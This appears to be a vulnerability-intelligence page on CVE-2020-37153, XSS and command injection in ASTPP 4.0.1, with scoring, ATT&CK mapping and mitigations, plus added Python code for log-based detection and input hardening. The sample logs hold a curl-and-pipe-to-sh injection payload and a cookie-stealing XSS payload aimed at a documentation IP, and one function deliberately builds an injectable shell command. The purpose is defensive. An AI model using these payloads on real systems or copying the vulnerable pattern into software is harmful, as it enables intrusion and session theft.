Cyber Resilience

CVE-2020-37153

Severity: High · Public PoC referenced

Published: 11 February 2026
Modified: 20 February 2026
CISA KEV: not listed

CVSS v4.0 base score: 7.7 (High)
Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS score: 0.0443 (90.1st percentile)
Risk Priority: 55 (floored blend · peak EPSS)

Summary

CVE-2020-37153 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Inextrix ASTPP. Its CVSS v4.0 base score is 7.7 (High); note that the v4.0 vector requires user interaction (UI:P) and rates attack complexity as high (AC:H), which fits the XSS component rather than the command-injection component described under Deeper analysis.

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 9.9% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).

Deeper analysis

CVE-2020-37153 covers a set of vulnerabilities in ASTPP 4.0.1, including cross-site scripting (CWE-79) and command injection flaws in the SIP device configuration and plugin management interfaces. ASTPP is an open-source VoIP billing and provisioning system. This analysis also reports a CVSS v3.1 base score of 9.8 (Critical; vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). That vector is not reconcilable with the v4.0 score of 7.7 shown above: 9.8 with AC:L and UI:N describes an unauthenticated command-injection path, while the 7.7 vector (AC:H, UI:P) describes the XSS path. Where the affected interfaces are network-reachable, prioritise on the higher rating.

Under the v3.1 scoring, unauthenticated attackers can reach these issues remotely over the network with low complexity, and the command-injection path needs no user interaction; the XSS path additionally requires an administrator to view the injected content. Exploitation enables injection of system commands, hijacking of administrator sessions via cross-site scripting, and execution of arbitrary code as root through manipulation of cron tasks, compromising confidentiality, integrity and availability.

Advisories and related resources include the official ASTPP GitHub repository at https://github.com/iNextrix/ASTPP, the project website at https://www.astppbilling.org/, a proof-of-concept exploit on Exploit-DB at https://www.exploit-db.com/exploits/47889, and a VulnCheck advisory detailing ASTPP VoIP remote code execution at https://www.vulncheck.com/advisories/astpp-voip-remote-code-execution. Practitioners should consult these for mitigation guidance and patch details.

Vulnerability details

ASTPP 4.0.1 contains multiple vulnerabilities including cross-site scripting and command injection in SIP device configuration and plugin management interfaces. Attackers can exploit these flaws to inject system commands, hijack administrator sessions, and potentially execute arbitrary code with root permissions through cron task manipulation.

CWE(s)

CWE-79 Cross-site Scripting

Related Threats

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

T1059.004 Unix Shell (Execution)
Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

Unauthenticated command injection in the public-facing web interfaces maps to Exploit Public-Facing Application (T1190) for initial access and to Unix Shell (T1059.004) for execution of the injected commands. The XSS component enables administrator session hijacking; it is not mapped to a separate technique here because initial access through the same interfaces is already covered by T1190.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
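The mapping above is more useful with something to run against traffic. The following is an added detection example, not part of this page or of the ASTPP project: it parses constructed access-log lines in Apache/nginx combined format, restricts attention to hypothetical path prefixes standing in for the SIP device and plugin management interfaces, and classifies decoded query-parameter values as a T1190/T1059.004 command-injection attempt or a T1190 XSS attempt. The URL paths, parameter names and log lines are all assumptions.

```python
"""Detection logic for the T1190 / T1059.004 mapping, run over constructed
web-server access-log lines. Added example, not from the page: the ASTPP
URL paths, parameter names and the log lines are assumptions."""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format; only client IP, method, target and status are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Hypothetical path prefixes for the interfaces the advisory names.
WATCHED_PREFIXES = ("/astpp/sip_devices/", "/astpp/plugins/")

# Indicators checked against each decoded query-parameter value.
SHELL_META = re.compile(r"[;|`]|\$\(|&&|\b(?:curl|wget|nc|bash|sh)\b")
XSS_MARK = re.compile(r"<\s*script|javascript:|\bon\w+\s*=|document\.cookie", re.I)

# Constructed sample traffic (not from any real incident). Line 2 carries a
# command-injection attempt, line 4 a cookie-stealing XSS attempt; lines 1, 3
# and 5 are benign shapes. Line 3 is a POST whose body the access log never sees.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Feb/2026:10:01:02 +0000] "GET /astpp/sip_devices/edit/12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Feb/2026:10:01:09 +0000] "GET /astpp/sip_devices/save?name=phone1%27%3Bcurl+http%3A%2F%2F203.0.113.7%2Fx.sh%7Csh%3B%27 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [11/Feb/2026:10:02:15 +0000] "POST /astpp/plugins/install HTTP/1.1" 200 310 "-" "curl/8.4.0"
203.0.113.7 - - [11/Feb/2026:10:03:40 +0000] "GET /astpp/sip_devices/list?search=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F203.0.113.7%2F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
192.0.2.9 - - [11/Feb/2026:10:05:00 +0000] "GET /astpp/sip_devices/list?search=phone HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""


def classify(target: str):
    """Return (technique, parameter, decoded value) for the first suspicious
    query value on a watched path, or None. parse_qsl does the percent- and
    plus-decoding, so the regexes run on what the application would see."""
    parts = urlsplit(target)
    if not parts.path.startswith(WATCHED_PREFIXES):
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if SHELL_META.search(value):
            return ("T1190 -> T1059.004 (command injection)", key, value)
        if XSS_MARK.search(value):
            return ("T1190 (stored/reflected XSS)", key, value)
    return None


def analyze(log_text: str):
    """Parse each line and collect findings as dicts for a SIEM or a ticket."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify(m["target"])
        if hit:
            technique, key, value = hit
            findings.append({
                "ip": m["ip"],
                "method": m["method"],
                "path": urlsplit(m["target"]).path,
                "technique": technique,
                "param": key,
                "value": value,
            })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Two caveats for anyone adapting this: access logs carry only the request line, so a POST to the plugin-install handler (line 3) is invisible to this rule and needs application logs or a WAF with body inspection; and a single decode pass is deliberate, since double-encoded payloads would reach the application double-encoded too unless it decodes twice, in which case decode twice here as well.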

CVEs Like This One

CVE-2020-37104 (same product: Inextrix Astpp)
CVE-2024-56060 (shared CWE-79)
CVE-2022-50908 (shared CWE-79)
CVE-2026-44669 (shared CWE-79)
CVE-2025-23882 (shared CWE-79)
CVE-2025-68501 (shared CWE-79)
CVE-2025-49043 (shared CWE-79)
CVE-2025-69316 (shared CWE-79)
CVE-2025-50006 (shared CWE-79)
CVE-2025-14320 (shared CWE-79)

Affected Assets

Vendor: inextrix
Product: astpp
Version: 4.0.1

Mitigating Controls (NIST 800-53 r5)

Flaw remediation (prevent)
Directly remediates the XSS and command injection flaws in ASTPP's SIP device configuration and plugin management interfaces through timely patching and flaw correction.

SI-10 Information Input Validation (prevent)
Prevents command injection and XSS exploitation by validating all user input to the vulnerable SIP device configuration and plugin management interfaces against an allowlist, and by encoding it for the output context where it is rendered.

AC-3 Access Enforcement (prevent)
Enforces authentication and authorization so that the exploited SIP device configuration and plugin management interfaces are not reachable by unauthenticated remote clients.
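What SI-10 means in code for the two weakness classes on this page, as an added example that is not ASTPP's source: a SIP device identifier interpolated into a shell string (the CWE-78 pattern) next to the allowlist-then-argv form, and the same identifier echoed into admin HTML unescaped (the CWE-79 pattern) next to the output-encoded form. The field name, the `sip show peer` CLI string and the `<td>` fragment are assumptions standing in for whatever the real handlers do; `printf` stands in for the real binary so the demo runs offline. The same allowlist-then-argv rule applies to the cron entries the advisory says can be manipulated for root execution: a cron spec assembled from request fields is another untrusted string that must be validated, not quoted.

```python
"""Illustrative hardening for the two weakness classes the advisory names.
Added example code, not ASTPP's own source: the field name, the
'sip show peer' string and the HTML fragment are assumptions."""
import html
import re
import subprocess

# Allowlist for a SIP device/peer identifier (assumption: letters, digits,
# '-' and '_', 1-32 characters). Anything else is rejected, not "sanitised".
DEVICE_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")


def validate_device_name(name: str) -> str:
    """Return name unchanged if it matches the allowlist, else raise."""
    if not DEVICE_NAME_RE.fullmatch(name):
        raise ValueError(f"invalid SIP device name: {name!r}")
    return name


def vulnerable_cli_command(device: str) -> str:
    """CWE-78 pattern: untrusted input interpolated into a shell string.
    'printf' stands in for the real command so the demo runs offline."""
    cmd = f"printf '%s\\n' 'sip show peer {device}'"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def safe_cli_command(device: str) -> str:
    """Fixed form: allowlist-validate, then pass an argv list (no shell)."""
    argv = ["printf", "%s\n", f"sip show peer {validate_device_name(device)}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def vulnerable_device_cell(name: str) -> str:
    """CWE-79 pattern: stored device name echoed into admin HTML unescaped."""
    return f"<td>{name}</td>"


def safe_device_cell(name: str) -> str:
    """Fixed form: output encoding for the HTML text context."""
    return f"<td>{html.escape(name, quote=True)}</td>"


# Constructed payloads (not taken from any advisory).
CMD_PAYLOAD = "phone1'; echo INJECTED; echo '"
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


def demo() -> dict:
    """Run both payloads through the vulnerable and fixed forms."""
    out = {"vuln_cli": vulnerable_cli_command(CMD_PAYLOAD)}
    try:
        safe_cli_command(CMD_PAYLOAD)
        out["safe_cli"] = "accepted"
    except ValueError:
        out["safe_cli"] = "rejected"
    out["vuln_html"] = vulnerable_device_cell(XSS_PAYLOAD)
    out["safe_html"] = safe_device_cell(XSS_PAYLOAD)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable builder lets the single quote in the payload close the argument, so the shell runs the injected `echo` as a second command; the fixed builder never invokes a shell, and the allowlist rejects the payload before it reaches argv anyway. On the HTML side, escaping at output time is the right layer because the stored name may have arrived through a path that skipped validation.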
